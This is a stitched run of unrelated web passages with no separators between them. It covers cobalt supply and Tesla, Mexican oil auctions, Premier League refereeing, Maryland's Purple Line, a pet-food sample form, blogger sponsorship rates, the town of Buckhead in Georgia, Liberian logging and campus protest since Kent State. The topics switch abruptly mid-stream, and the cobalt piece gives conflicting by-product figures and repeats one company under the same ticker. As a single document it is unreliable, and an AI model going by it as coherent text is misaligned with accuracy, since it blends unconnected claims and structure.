The Tenke Fungurume mine is one of the world 's largest known cobalt resources . The concessions are located in the Katanga province in the southeast region of the Democratic Republic of the Congo ( DRC ) . Freeport-McMoRan Inc. ( NYSE : FCX ) holds a 56 percent interest , Lundin Mining ( OTCPK : LUNMF ) holds an indirect 24 percent equity interest and Gécamines , the Congolese state mining company , holds a 20 percent carried interest .
In May , 2016 , China Molybdenum acquired Freeport 's 56 percent controlling interest in the mine for US $ 2.65 billion , the largest investment ever in the country . Lundin Mining was left with three options : allow the China Moly deal to proceed , supplant the offer by exercising a right to first offer or sell its own stake to China Moly ( or a third party , for that matter ) .
In November , and after several extensions , Lundin Mining finally announced it was selling its 24 percent stake to an affiliate of Chinese private-equity firm BHR Partners for US $ 1.14 billion . Freeport 's sale to China Moly was expected to be completed before year 's end , whilst Lundin plans to close its sale in early 2017 .
China Moly also acquired this year from Freeport a 100 percent interest in the Kisanfu exploration project located in the DRC and a 56 percent controlling interest in the Kokkola refinery in Finland ( about 10 percent of the world 's refined cobalt last year ) . Needless to say that all that cobalt from the refinery is expected to be shipped to China , South Korea and Japan from now on .
The implications are clear . China is now leveling its game in upstream cobalt and is already a major owner of downstream assets in the DRC , embodied by Huayou Cobalt ( CH:603799 ) and Zhejiang Huayou Cobalt ( CH:603799 ) . It will keep on securing cobalt mines and downstream assets for its own needs .
In November , Albert Yuma Mulimbi , head of the state-controlled Gécamines , passed on to the Financial Times his discontent of partnerships with western companies and , in particular , on the Freeport-McMoRan deal . Left with minority investments in most joint ventures ( JV ) , Mr. Yuma believes that existing deals failed to deliver on dividends . The partnership with China Nonferrous Metal Mining . where Gécamines has a 49 percent stake , is the model he wants to generalize . One more headache for western operators .
Supply and demand for cobalt
As I stated in a previous article , we are already witnessing an increased scarcity of cobalt supply . Approximately 97 percent of the world 's supply of cobalt comes as a by-product of nickel or copper . But the price of the two other base metals have been plunging , to say the least , and this year reached six-year lows , making many deposits uneconomic .
Basic economics would tell us that whenever there is a soaring demand and a market supply moving into deficit , shortages and consequently an impact on prices are inevitable .
New primary cobalt mines may come online should cobalt prices soar ; however , exploration , licensing and development take time and require billions of dollars of investments . In addition , 60 percent of the world 's cobalt reserves and resources originate in the DRC , which is riddled with child labor and exploitation .
On the demand front , and according to the Cobalt Development Institute ( CDI ) , 58 percent of global cobalt production is already used in many diverse industrial and military applications ( super alloys , catalysts , magnets , pigments… ) that rely exclusively on the material . Cobalt represents a negligible part of the costs for these companies and thus they can afford to pay regardless of the price . But that is a dangerous game for battery makers . Material costs account for about 60 percent of LIB total cost and battery makers can not take away cobalt from companies for whom the metal is an absolute requirement . Think GE and its jet engines .
The Tesla conundrum
So where does that leave us with Tesla ? Elon Musk ambitiously aims at producing 500,000 electric vehicles a year by 2018 , and Tesla has repeatedly stated that the cobalt will be sourced exclusively in North America . Whether this is a realistic assumption is a different story .
The United States Geological Survey ( USGS ) states that cobalt production in 2015 was 124,000 metric tons . Canada and the U.S. together produce roughly 4 percent of the world 's supply , nowhere near Tesla 's needs for just one of its models . Indeed , estimations from InvestorIntel show that half a million units of Tesla 's Model 3 would be equivalent to 7,800 tons of new cobalt demand , or roughly 6 percent of the annual cobalt production worldwide . The math does not seem to add up . Tesla reportedly has difficulties securing off-take agreements from traditional cathode material suppliers and is reaching down to junior miners .
Precisely regarding the juniors ' landscape , eCobalt Solutions Inc. ( formerly Formation Metals ) ( TSX : ECS ) is a Canadian mineral exploration and mine development company primarily owning the Idaho cobalt project , a high-grade and primary cobalt deposit in the U.S .. The highly anticipated project is by far the most advanced one in the region and should go online in a year 's time . Two more years will be needed to run at full capacity . Production is estimated to reach roughly 1,500 tons annually over the course of a 12.5-year lifetime , i.e . about 1 percent of the global market . Compare this to Tesla 's needs for the Model 3 and the new supply of cobalt in North America looks muted at best .
Basic economics would tell us that whenever there is a soaring demand and a market supply moving into deficit , shortages and consequently an impact on prices are inevitable . Tesla looks doomed… ceteris paribus . So , is it really ?
Good news for Tesla bulls : There are several reasons why this may not be the case .
Battery mix . For the Model S , Tesla has been using high energy density nickel-cobalt-aluminium-based ( NCA ) battery cells sourced from Panasonic . Again , we do n't know the exact composition of the Panasonic/Tesla batteries , but typically cobalt represents about 0.22 kg/kWh in NCA batteries believes John Petersen from InvestorIntel . This compares to 0.36 kg/kWh for nickel-manganese-cobalt ( NMC ) batteries , which are adopted by most peers ( and in which the three components are usually evenly split ) . Tesla would withstand more pressure versus its peers in the event of soaring prices .
The Chinese BYD , a major player in the EV space , has adopted lower energy density Lithium-Iron-Phosphate LFP chemistry . Reconfiguring manufacturing capabilities and use instead as LFP or Lithium-manganese-oxide ( LMO ) that do n't need cobalt is always an option . However , this might severely hamper competitiveness and quality .
Substitution . “ Ceteris paribus ” is key here . A complete shift away from high-energy batteries looks hypothetical at this stage : NMC , NCA and LCO batteries provide the highest energy density as reported by Battery University , and all require cobalt . However , there has been recently efforts to produce other types of battery chemistries that do not require cobalt as stated by the CRU . Tesla has also been trying to remove cobalt from the equation and add nickel instead , according to its CTO JB Straubel .
We may well see a quick turnaround from cobalt-intensive batteries toward a validated and optimized new high-energy battery technology should it go online . And the high costs triggered by a shift away from traditional batteries might prove beneficial when opposed with the prospects a cobalt cliff . So far attempts for substituting cobalt resulted in a loss in product performance . But nothing is set in stone .
Demand for nickel . Let 's assume for a second that the substitution project remains in draft and that cobalt remains indispensable . Around Ninety-five percent of the world 's supply of cobalt comes as a by-product of nickel or copper . As illustrated by John Petersen , “ Every year , the world 's nickel miners sell $ 14.58 billion of nickel and $ 1.05 billion of cobalt , which means cobalt revenue represents 6.7 % of their total revenue . It 's even worse with copper miners who sell $ 68.4 billion of copper and $ 0.92 billion of cobalt , which means cobalt revenue represents 1.3 % of their total revenue. ” Certainly frightening numbers . Many mines have become a casualty of the low prices and many are being taken offline or “ placed on maintenance ” for an extended period of time until market prices justify further investments .
However , if it is well-established that the dependence on a primary product is a key supply risk , the opposite is also true . There will be cobalt if there is enough demand for the primary metals . It is unclear what the mix of Panasonic/Tesla 's batteries is , but traditionally an NCA cathode is comprised of roughly 80 percent nickel and 15 percent cobalt . Increased demand for nickel may spur nickel production and , as a consequence , cobalt product . This may overall add some counterweight in the balance .
Identified resources versus reserves . In addition , identified cobalt resources are much larger than existing reserves . According to the CDI , “ there seems to be enough known land sources of cobalt to last for at least 100 years and for many , many more years if speculative and hypothetical resources for deep sea , ocean floor resources are taken into account ( about 120 million tonnes according to the USGS ) . ”
The CDI thus remains confident that “ cobalt is not running out , but its availability will depend upon many factors such as accessibility , price , demand , technological development and global economic growth. ” Obviously mining cobalt cheaply in deep water is nothing more than a bad science fiction movie , but should become economically viable ( disruptive technologies might start showing their teeth , as we have witnessed in deep water drilling and more recently with fracking ) .
Recycling . Cobalt ( as opposed to oil , for instance ) is fully recyclable . Roughly 15 percent of U.S. cobalt consumption is from recycled scrap today . For many applications , the metal is used but not consumed and so can be recycled . Needless to say that recycling can help reduce the need to hunt for new sources of cobalt . In no circumstances is this a magic solution whereby 100 percent can be recycled indefinitely . Existing processes are energy-consuming and can definitely be improved . But that is also an idea to weigh in the balance .
Conclusion
That 's a lot of “ ifs , ” I grant you that . Tesla is entering an age of supply chain transparency , as Simon Moores from Benchmark Intelligence states , and it would n't hurt to see more communication from Tesla on that front . However , there are many factors that could be part of a complex cobalt equation . I would n't go as far as surrender already and turn into a structural Tesla bear .
Mexico lowered the requirements deepwater oil and gas auctions , aiming to encourage bidders for offshore exploration and development . The country 's oil industry regulator Comisio Nacional de Hidrocarburos made changes into the requirements for the bidders of December 's auction and to attract private and foreign investors . Mexico opened its offshore sector for the foreign and private investors , trying to get funding for its delaying economy . However , the low oil prices and tightened auction requirements discouraged the investors and last months received no interest from foreign companies .
The energy companies and investors will have more flexibility to structure their bids , as they will no longer need to be the biggest stakeholder in a particular well or oilfield . This will allow the companies not involved in the day-to-day running of the field to be lead investors . Moreover the government will offer bigger blocks for development and exploration . Also the state share into the field will be smaller .
All these changes aim to attract bidders for the auction , which will be held on December 5 . It will comprise 10 potentially oil-rich deepwater blocks in the Gulf of Mexico , near the border with the USA . The government expects the private investors to take participation in bidding for the oil blocks and to inject several billion of dollars into the delaying economy .
Hackett : `` It is the level of performance on the field of play I am complaining about and I see standards falling ''
Former referees ' boss Keith Hackett claims officiating standards in the Premier League over Christmas were `` bordering on appalling '' .
Hackett , 70 , has named five current top-flight referees who should be demoted at the end of the season .
In addition , he believes successor Mike Riley should step down .
Professional Game Match Officials Limited ( PGMOL ) has rejected Hackett 's claims , stating standards have risen since Riley replaced Hackett in 2010 .
Former Fifa referee Hackett claims he counted `` over 20 major errors '' during the Christmas period .
He cited Wayne Routledge 's red card during Swansea 's game at QPR on 1 January , which was later overturned , as being of particular concern .
`` I see standards falling , '' he said . `` Over the Christmas period , it reached standards that were bordering on appalling . ''
Hackett felt Routledge had been the victim of a `` reckless challenge '' by Karl Henry and expected the QPR player to have been sent off intead .
C'mon ref ! ! Managers ' recent frustrations `` The officials clearly got it horribly wrong . Frustrated is an understatement . Baffled is more the feeling '' - West Ham United manager Sam Allardyce on Alex Song 's disallowed goal in last month 's defeat by Arsenal . `` I am losing a little bit of faith . I 'm limited on what I can say and I 'm tired of it . It 's hard when we are constantly getting decisions like this . It sounds like me moaning but I do n't want to be talking about it , I only care about the football '' - Swansea manager Garry Monk on the Routledge red card . `` We were mainly talking about the referee . I hope there 's no lip readers otherwise we 're both in serious trouble '' - Hull 's Steve Bruce on his touchline chat with Jose Mourinho during the 2-0 loss to Chelsea .
Hackett also criticised Andre Marriner 's `` pretty poor performance '' in the game between Manchester City and Everton at the start of December .
`` First of all , the failure to spot a challenge that resulted in Sergio Aguero having to go off , then a non-penalty decision , '' said Hackett .
`` I was with a group of Fifa referees from Nigeria who watched with amazement . Do you think I took joy in that ? ''
Marriner is one of the five referees Hackett believes should finish at the end of the season .
Writing in his blog , You Are The Ref , Hackett also targeted Mike Jones , Lee Mason , Chris Foy and last season 's FA Cup final referee Lee Probert .
`` You ca n't live on your reputation , '' Hackett said . `` At the moment , these guys are performing well below the level . ''
Kevin Kilbane , Radio 5 live pundit `` Some of the decisions made in and around Christmas and over this last week or so have looked ridiculous . Some of the decisions are beyond belief at times . A lot of the decisions early on in the season have been quite good . But when you get some howling errors they seem to escalate . ''
Hackett , who refereed at the European Championship and the Olympic Games in 1988 and who led PGMOL for almost six years after replacing Philip Don in March 2004 , feels Riley should take responsibility .
`` I am criticising very strongly , '' said Hackett . `` The performances of the referees are not acceptable . He must carry the responsibility . ''
Information supplied to the BBC by PGMOL states that the accuracy of decision-making by referees in the Premier League is currently at an all-time high .
The figures claim accuracy on major decisions was up to 95 % from 94.1 % , accuracy on decisions in the penalty box stood at 98 % , and offsides were now 99 % accurate , compared to 92 % when Riley took over .
PGMOL adds that delegate marks for referees have gone up every season since Riley succeeded Hackett and the latest data shows referees are being asked to do 176 high-speed runs and 50 sprints in a game - a 64 % increase on five seasons ago .
Koch Brothers Loom Over Maryland 's Purple Line Fight
Look whose envoy has been dispatched to undermine Maryland 's Purple Line . Once again , Randal O'Toole of the Koch brothers-funded Cato Institute has been deployed to attack a light rail project in distress .
On Monday , the Maryland Public Policy Institute , a right-wing think tank , is hosting a debate on whether to construct the light rail project in the DC suburbs , which newly elected Governor Larry Hogan has threatened to kill . The debate will pair Rich Parson , vice chair of the Suburban Maryland Transportation Alliance , with O'Toole , professional rail critic .
O'Toole works for the Cato Institute , founded and funded by the Koch brothers . Cato dispatches O'Toole to political squabbles involving rail transit around the country , from Indianapolis to Honolulu . He 's so rabidly anti-rail that after Hurricane Sandy , he suggested New York City should replace its subway system with a network of underground buses .
Despite dispensing ridiculous advice , O'Toole continues to be treated as a serious thinker by American media outlets . The Washington Business Journal recently printed an O'Toole broadside against the Purple Line , replete with his typical arguments , like light rail is worse for the environment than driving .
Hogan 's appointee to head the state DOT , Pete Rahn , was scheduled to give opening remarks at the MPPI event . But sources tell us that Rahn has since backed out prior to a bruising confirmation hearing with Maryland 's Democratically controlled legislature .
At the hearing , Maryland lawmakers raised questions about a highway project in New Mexico , where Rahn was previously DOT chief . NM-44 , a 118-mile , $ 420 million road-widening that Rahn oversaw in New Mexico — the most expensive highway project in the state 's history at the time — awarded a huge and unusual contract to Koch Industries .
An investigation by the Albuquerque Business Journal [ PDF ] reported that Koch Industries was the only bidder on the project and approached Rahn directly with the proposal before bids had been requested . Koch Industries was also awarded an unprecedented $ 62 million contract for a 20-year maintenance warranty .
Former New Mexico Republican State Senator Billy McKibben told the Illinois Business Journal ( which reported on the controversy after Rahn was installed as the head of Missouri DOT ) that the deal would have bankrupted the state if it was n't for a well-timed oil and natural gas boom .
Correction 2:51 p.m. February 26 : The original version of this story included the wrong date for the Maryland Public Policy Institute debate . It is March 2 .
Sample Request Form
We 've been providing free home delivery of tasty , all-natural food to thousands of pet lovers in the Triangle/Triad of North Carolina since 2005 – and most of our business comes from customer referrals . Please tell a friend !
SAMPLES AVAILABLE ONLY TO NORTH CAROLINA RESIDENTS . UPS charges may apply .
If you live outside of our Free Delivery Zone there will be a $ 7.00 charge for shipping the samples . Click here to find out what zone you are in .
New Sample Request Form Your Name *
Street Address *
Apt/Unit
City *
Zip Code *
Choose Your State : * North Carolina
Other State
Our Apologies ... Only submissions from North Carolina will be accepted at this time . If you 're in North Carolina outside our delivery zone , please call us to finish your request . UPS shipping charges will apply .
Phone number *
Email *
2 . How did you hear about The Pet Pantry ? TV Veterinarian Radio Saw our van Advertisement Internet Search Met us at a show H.E.A.L . Program Animal Rescue/Shelter Referred by a friend Spoke with Nate other
Please tell us who referred you :
( We 'd like to say `` thanks '' , plus you 'll receive a $ 5 credit towards any future orders , too )
3 . Tell us about your pet ( s )
Name of Pet 1 *
Animal * Dog
Cat
Age *
Breed
Activity Level Not very active Normally active Very active
Allergies ?
Is he/she a healthy weight ? Yes
No
Current Food
Feeding issues/concerns ?
Do you have another pet you would like to request a sample for ? * No
Yes
Name of Pet 2
Animal Dog
Cat
Age
Breed
Activity Level Not very active Normally active Very active
Allergies ?
Is he/she a healthy weight ? Yes
No
Current Food
Feeding issues/concerns ?
Do you have another pet you would like to request a sample for ? No
Yes
Name of Pet 3
Animal Dog
Cat
Age
Breed
Activity Level Not very active Normally active Very active
Allergies ?
Is he/she a healthy weight ? Yes
No
Current Food
Feeding issues/concerns ?
Do you have another pet you would like to request a sample for ? No
Yes
Name of Pet 4
Animal Dog
Cat
Age
Breed
Activity Level Not very active Normally active Very active
Allergies ?
Is he/she a healthy weight ? Yes
No
Current Food
Feeding issues/concerns ?
Do you have another pet you would like to request a sample for ? No
Yes
Name of Pet 5
Animal Dog
Cat
Age
Breed
Activity Level Not very active Normally active Very active
Allergies ?
Is he/she a healthy weight ? Yes
No
Current Food
Feeding issues/concerns ?
Do you have another pet you would like to request a sample for ? No
Yes
Name of Pet 6
Animal Dog
Cat
Age
Breed
Activity Level Not very active Normally active Very active
Allergies ?
Is he/she a healthy weight ? Yes
No
Current Food
Feeding issues/concerns ?
Do you have another pet you would like to request a sample for ? No
Yes
Name of Pet 7
Animal Dog
Cat
Age
Breed
Activity Level Not very active Normally active Very active
Allergies ?
Is he/she a healthy weight ? Yes
No
Current Food
Feeding issues/concerns ?
Do you have another pet you would like to request a sample for ? No
Yes
Name of Pet 8
Animal Dog
Cat
Age
Breed
Activity Level Not very active Normally active Very active
Allergies ?
Is he/she a healthy weight ? Yes
No
Current Food
Feeding issues/concerns ?
Do you have another pet you would like to request a sample for ? No
Yes
Name of Pet 9
Animal Dog
Cat
Age
Breed
Activity Level Not very active Normally active Very active
Allergies ?
Is he/she a healthy weight ? Yes
No
Current Food
Feeding issues/concerns ?
Do you have another pet you would like to request a sample for ? No
Yes
Name of Pet 10
Animal Dog
Cat
Age
Breed
Activity Level Not very active Normally active Very active
Allergies ?
Is he/she a healthy weight ? Yes
No
Current Food
Feeding issues/concerns ?
4 . Which blends are you interested in sampling ?
Canine Blends Holistic Grain Free Salmon & Sweet Potato Canine
Holistic Grain Free Chicken Canine
Holistic Grain Free Whitefish & Duck Recipe Canine
Holistic Grain Free Turkey & Sweet Potato Canine
Holistic Grain Free Buffalo & Duck Canine
Holistic Grain Free Mature Dog
Holistic Growth & Performance Canine
Holistic Chicken and Rice Canine
Premium Adult Maintenance Canine
Natural Lamb & Rice Select Canine L.I.D .
Holistic Lamb & Rice Premium Canine
Holistic Choice Salmon Canine
Holistic Opticoat- Hypoallergenic Canine
Holistic Select Low Fat Canine
Feline Blends Holistic Life Feline
Holistic Choice Feline
Holistic Choice Adult Indoor Lite Feline
Holistic Grain Free Duck & Herring Feline
Learn more about our blends HERE
* If you are not in our free delivery zone , UPS charges will apply . Please contact us to complete your sample order .
How to set your sponsored content rates | The business of blogging
As a blogger , one of the hardest things to figure out is how much you should be charging for your content . Companies are often unwilling to pay bloggers unless they set their own rates , and in an industry that 's very closed-doors about how much everyone is charging , it can be difficult to figure out where your ballpark should even be ( much less the exact figure that you want to aim for ) .
Earlier this year , I surveyed a number of fashion , beauty , and lifestyle bloggers to anonymously find out how much they were charging . Here are those results .
Average monthly visitors for the blogs surveyed .
Background information
First off , if you missed the rest of my Business of Blogging series , you can view the first few posts here , or at the links below !
Additionally , I wanted to share a bit of information about the bloggers who took this survey before we begin . Most of the respondents were beauty bloggers ( 84 % ) , and on average , they posted 2-3 times each week .
The number of unique visits and page views that these blogs saw varied greatly , but they averaged 14 000 monthly unique visitors and 29 000 monthly page views . 63 % of bloggers mostly waited to be approached by brands , and there was no significant difference noted in the rates secured by bloggers who took the initiative to approach brands .
Sponsored posts
For a single sponsored post , most bloggers are charging about $ 250 . A further breakdown follows :
100 000+ monthly visitors : $ 1200- $ 1800 per post . Average $ 1500 .
$ 1200- $ 1800 per post . Average $ 1500 . 10 k to 90 k monthly visitors : $ 60- $ 500 per post . Average : $ 280 . Instagram : $ 15-200 per post . Average : $ 100 .
$ 60- $ 500 per post . Average : $ 280 . 50 to 9000 monthly visitors : $ 10-400 per post . Average : $ 125 . Instagram : $ 24- $ 150 per post . Average : $ 45 .
$ 10-400 per post . Average : $ 125 .
Within each of these tiers , much of the discrepancies can be explained by bloggers ' Instagram follower counts . With almost no exceptions , those with over 15k followers on Instagram were the ones commanding the upper range of each spectrum , and those with under 10k followers were charging the lower end of each .
Blog stats aside , here 's how everyone 's Instagram numbers broke down when examined on their own :
Under 3k followers : $ 15- $ 100 per post . Average $ 30 .
$ 15- $ 100 per post . Average $ 30 . 3k to 50k followers : $ 25- $ 400 per post . Average $ 125 . * Note : this category 's data set was all over the place . Outliers aside , most bloggers in this category charge $ 100 per post .
Sponsored post rates vs. unique monthly visits . Note : outliers were excluded from this scatter plot because frankly , the rest of the data looked like one big lump with them included . For the full range of the survey , please read the textual content of this post .
Blog sponsorships and banner ads
Far fewer bloggers offered blog sponsorships and banner ads than sponsored posts , but there were more than I had expected ! 26 % of bloggers offered sponsorships and 34 % of bloggers offered banner ads , with sponsorship fees being consistently higher than banner ads .
Over 10 000 monthly visitors : Average sponsorships $ 300/month , ads $ 50/month .
Average sponsorships $ 300/month , ads $ 50/month . Under 10 000 monthly visitors : Average sponsorships $ 100/month , ads $ 35/month .
Event coverage
For event coverage , most bloggers either charged nothing or charged around $ 200 .
Because only 20 % of respondents included data for this section , I will not be drawing any additional conclusions .
Overall conclusions & tips for getting a better rate
I 'm hoping that these averages will help provide you with a starting block for how much you can be charging if a brand requests specific content or coverage from you , but they 're not at all a definitive guide .
One of the things that I learned while going through these rates was that nowadays , sponsored content rates are no longer only set by page views . Social media is a key determining factors in rate-setting , and a while a difference of 10k page views has no impact on a blogger 's rate at all , a difference of 10k Instagram followers can change the rate that they command by hundreds of dollars .
Instagram stats had the most significant impact on how many bloggers were able to charge , and Bloglovin ' stats seemed to have no influence at all . However , there was one big predictor for who saw the most visitors and those who made the most cash : the top five bloggers surveyed all posted daily or multiple times a day .
In conclusion ? If you 're looking to make blogging a living , focus on growing your social stats – primarily Instagram and YouTube ; not so much Facebook or Twitter . From there , stay honest , and make sure to update your blog daily if possible !
What are your tips for rate-setting and sponsored content ? Leave your do 's and don'ts in the comments below !
Image sources : ( 1 ) ( 2 )
The Town of Buckhead is open for official business once a week . On Tuesdays , Cheryl Saffold mans the phones at town hall ; most calls she fields are about business licenses . One of the first questions Saffold asks , politely , is whether callers are sure they have the right number .
“ They can be very insistent , ” Saffold told me . So she humors them , asking what kind of business they are opening—restaurants , boutiques , bars , she 's told—and where they will be located . “ Nine time out of ten , the address is Peachtree Street , ” she said . Over the years , she 's become familiar with the lesser-known streets , too . How would she fare if she drove 65 miles east to Buckhead , the affluent Atlanta neighborhood ? “ I might , could get around pretty good , ” she mused .
Navigating the town of Buckhead , which occupies less than a square mile , is somewhat simpler than driving on Peachtree Street , and not only for natives like Saffold . Recently , on the way back from Augusta , I turned off I-20 onto Seven Islands Road , followed a sign for the historic district , and soon reached a cluster of brick commercial buildings fronting the railroad . The buildings were empty and an old gas pump out front was rusted solid .
Buckhead was settled in the early 1800s , and , like its counterpart in Atlanta , was named because a proud pioneer displayed a hunting trophy . The town was incorporated in 1908 , but its heyday came in the 1930s , when the Georgia Railroad designated it as a layover ; trains were not allowed to run on Sundays . An enterprising hotelier and several restaurateurs catered to the travelers and rail crews taking the mandatory Sabbath break . But between the Great Depression and the boll weevil and loosening blue laws , business slowed and has never really recovered since the depot closed in the 1950s .
“ It 's only me and the post office now , ” said Janet Willis , who runs Buckhead Grocery , which sits catty-corner from the railroad crossing and does brisk business in lottery tickets and bait ( Buckhead is on the way to Lake Oconee and surrounded by smaller lakes and ponds ) . She serves breakfast and lunch daily ( the $ 5.49 cheeseburger platter is popular ) and , in addition to basic groceries , stocks everything from contact lens solution and Johnson 's Baby Powder to envelops and Elmer 's Glue . I spotted a stack of chess sets next to a box overflowing with bags of cotton balls .
Willis moved to Buckhead from Covington in the mid 1980s . She and her husband bought the store , but sold it after his cancer diagnosis . After his death , she worked installing cable but missed the store , so took over as manager . “ I 'm open eight days a week—or that 's what it feels like sometimes , ” she said . Willis also gardens , and sells her produce to supplement the store 's canned and packaged goods . I left Buckhead Grocery with a sack of homegrown corn and tomatoes and a tub of Willis 's homemade banana pudding .
“ We 're country here . It 's a real sense of community , ” said Willis . “ We know each other 's names—and the names of all the children. ” Saffold , whose roots in Covington are deep ( there 's a Saffold Road that parallels Seven Islands Road and runs through the family 's former cotton plantation ) , said that she ca n't imagine settling anywhere else . Her children live in Buckhead , now . “ This is home , ” she said . The town celebrates its history every April with the Buckhead Days Festival and “ The Real Buckhead 5K. ” This year 's race set a record , with 124 runners .
On the day I visited , the post office already had closed . I called later to speak with postmaster Kathy Allen . Over the years confusion arose as letters intended for residents and businesses in Atlanta arrived in Buckhead—30625 . Back in the 1990s , Sam Massell , who runs the Buckhead Coalition business group , helped smooth out an arrangement that allows mislabeled mail to be forwarded to Atlanta rather than returned to sender .
“ We do n't get too much of that now , ” Allen said of the mid-directed mail . “ If they write Buckhead , instead of Atlanta , but they have the right ZIP code , we just send it on through . ”
The occasional mid-directed tourist still arrives in Buckhead . One woman stopped in town hall and asked for directions to Lenox Square , recalled Saffold .
“ When I tell them they are not in Atlanta , they look at me like I 'm crazy , ” she said . “ But when you get off the interstate and you see cows , it 's quite evident that you are not in Atlanta . ”
Liberia rainforest : '60 % handed to logging companies '
Up to 60 % of Liberia 's rainforests are thought to have been granted to logging companies
Continue reading the main story Related Stories
Uncontrolled logging is posing a risk to Liberia 's virgin rainforests and depriving people of economic benefits , campaign group Global Witness warns .
Its report says that logging companies have been granted more than 60 % of the country 's rainforests in the six years since Nobel Prize winner Ellen Johnson Sirleaf became president .
It found that use of private contracts which bypass regulations are common .
President Sirleaf has already ordered a investigation into the issue .
She had been praised for revoking corrupt and badly managed logging companies when she took office in 2006 , after timber was used to finance arms sales during Liberia 's long and bloody civil war .
The West African nation still has some of the largest areas of rainforest in the region , but the Global Witness report alleges that nearly a quarter of Liberia 's landmass has been signed to logging companies using secret and often illegal permits .
'Massive deforestation '
It says that some logging companies are signing Private Use Permits ( PUPs ) , which were designed to allow private landowners to cut trees on their property , in order to get round legislation .
`` It does mark an extraordinary breakdown of law in Liberia 's logging sector , a sector which has received an awful lot of support since the war both from President Johnson Sirleaf and from the US , the EU and other international partners , '' said Jonathan Gant , a policy advisor at Global Witness .
Local activists first raised concerns in June 2011 , and the Liberian government put a moratorium on PUPs in February - although it does not appear to have fully stopped the practice .
President Sirleaf ordered a full-scale investigation last week and suspended a government official .
Liberian Information Minister Lewis Brown told the BBC : `` We do n't want to even imagine that government officials and authorities assigned specific duties would undertake to do something else . It is frankly mindboggling . ''
He said that PUPs had been designed for non-commercial purposes , such as farmers with small areas of land - not major international logging firms .
`` What we 're finding out sadly is that the community is not benefiting , the government is not getting the taxes it requires . But more than that the guys are spreading out into the countryside and engage in massive deforestation and this was never the intention . ''
Silas Siakor of the Sustainable Development Institute commented : `` If Liberia 's forests and the people who depend upon them are not to be swallowed whole by Private Use Permits then the suspension of logging operations must stand this time and a comprehensive independent investigation must be undertaken . ''
School 's out . That was the news in early May 1970 , when hundreds of colleges and universities across the country canceled classes , exams , and graduation exercises , fearing violent student protests against the war in Vietnam . Campus demonstrations and strikes escalated following President Richard Nixon 's announcement on April 30 that U.S. ground troops would cross the border from Vietnam into Cambodia . The military 's mission was to find and destroy sanctuaries the North Vietnamese army used to support its forces fighting on the South Vietnamese side of the border .
The next day , Friday , May 1 , students at Kent State University in Ohio joined thousands of others across the country to mount protests against the invasion that would eventually grow into what news reports called a national student strike . When demonstrations spilled from the campus into downtown Kent in the early hours of Saturday , May 2 , Mayor Leroy Satrom requested National Guard troops from Gov . James Rhodes of Ohio . Confrontations between students and guardsmen ensued over the next 36 hours , culminating just after noon on Monday , May 4 , when the soldiers fired their rifles at students , killing four and wounding nine . Two of the dead were passers-by who had not been protesting .
Within days , students at other colleges and universities responded with rage at the Kent State shootings . Many campuses closed temporarily in order to dampen the student anger , and some did n't reopen until the fall .
The approaching 40th anniversary of the spring 1970 events invites comparisons with the placid political climate on campuses today , a quietness that prevails even though the nation remains mired in wars as controversial as Vietnam was . `` Where 's the outrage ? '' is a common retort of radical elders to the lethargy they see on campuses today . Guardsmen on campus were a problem in 1970 ; but this spring the problem for antiwar activists is a student culture so quiescent that troops are unnecessary .
The exceptions to the dormancy that dominates campuses are few , and even those underscore the larger countrywide pattern of political indifference . Student strikes in California this spring against the privatization of public education and the rising costs of attending colleges and universities were signs that student political life still has a pulse . The call for a national strike and `` day of action '' on its namesake date by the California March 4 movement had a late-60s/early-70s ring to it , but responses to the call were underwhelming , especially outside of California .
The usual explanations for the difference between then and now wo n't do . The suggestion , for example , that the renewal of a military draft would ignite students ' self-interest does n't account for the fact that most 60s-era students were sufficiently sheltered from the draft to make their chances of seeing combat negligible . Lewis B. Hershey , director of the Selective Service until 1970 , granted draft deferments to students and some white-collar professionals on the reasoning that engineers , scientists , and teachers were essential to national security and the war effort . By the time the lottery system evened the playing field somewhat in 1969 , `` Vietnamization '' was under way , and the number of combat roles filled by American GI 's began shrinking .
Likewise , the argument that students today are shielded from the terribleness of war by a government and news media that do n't reveal the graphic truth is weak . A comparison of news coverage , past and present , would show that there is far more information available now .
In any case , the idea that students of any generation are so self-interested that they would oppose a war only because it would not be in their interest to fight in it—which seems to be the assumption behind the claim that if there was a draft now , as in the 60s , students would oppose the war—has a finger-shaking quality to it that , delivered by older mentors , is not going to deliver the intended results . That attitude toward student apathy , along with the notion that students remain willfully uninformed about the causes and consequences of the current wars because , well , life is more comfortable that way , works better as a scold than an explanation .
The fact is that student culture today is formed in institutional settings that have changed since the 1960s and 1970s .
The higher cost of education , for one thing , defines two paths to an undergraduate degree , and both curtail campus political culture . One path , typical of private colleges and universities , dictates a lock-step progression through liberal-arts curricula preset to move students from matriculation to graduation in four years . Students ' packed schedules allow little time for such frivolity as political activism . The other path , typical of public colleges and universities , harnesses many students to full- and part-time jobs in order to pay for their educations , which might extend far beyond four years . Mediating institutions like neighborhood schools and churches , labor unions , or even extended families that may once have helped students integrate their on- and off-campus lives are now frayed by cost-saving consolidations , plant closings , and the greater mobility required for job searches .
Advertisement
And unlike the paths leading beyond bachelor 's degrees to careers in the expanding post-World War II economy , those walked by many students today merely lead to unpaid internships and their parents ' basement apartments .
The very effectiveness of the student movement 's mobilizations in the 60s against the war in Vietnam wrought other changes that mitigate a repeat of that era 's radicalism . Disasters like Kent State taught administrators to `` never say never '' to student demands . Their own ham-handedness having led them to the tactic of `` repressive tolerance , '' presidents and deans put liberal wrappings around innocuous initiatives like `` community service '' and `` experiential learning '' and handed them back to students as the new `` activism . '' Want an organization for human/labor/abortion/housing rights ? Sure . Want an office and budget with that ? No problem . Course credits ? We can do that , too .
The proliferation of minor sports and the Title IX decision in 1972 that opened athletics programs to women filled the discretionary hours in college life for still more students . The image of students and faculty members engaged in after-hours plotting to change the world is hopelessly nostalgic . Offers to meet students after class for coffee and conversation about a lecture are rebuffed with `` I 've got practice '' or I 've got a meeting . ''
New practices like student course evaluations , which grew out of student dissatisfaction with classes they found irrelevant to the events of the 60s—with the Vietnam War at the top of the list—were usurped by college authorities . The questionnaires once formulated by student groups—which then distributed them and collected the data for redistribution to classmates for their use—became tools in the hands of administrators for closer oversight of the curriculum and control of the faculty .
And the same 24/7 media establishment that brings us more news faster also brings the mind-strangling programming of American Idol and ESPN , accompanied by more low-priced electronic gadgetry than the family SUV can haul to the campus . Forty years ago , one hall phone for a dozen rooms and a television lounge shared by students in the dorm necessitated the negotiated use of social space and fostered a common sense of American life . Now , students are plugged into their own isolating iSpace . Facebook , Twitter , and the Internet may create community of a sort , but those communities are fragmented and isolated from one another .
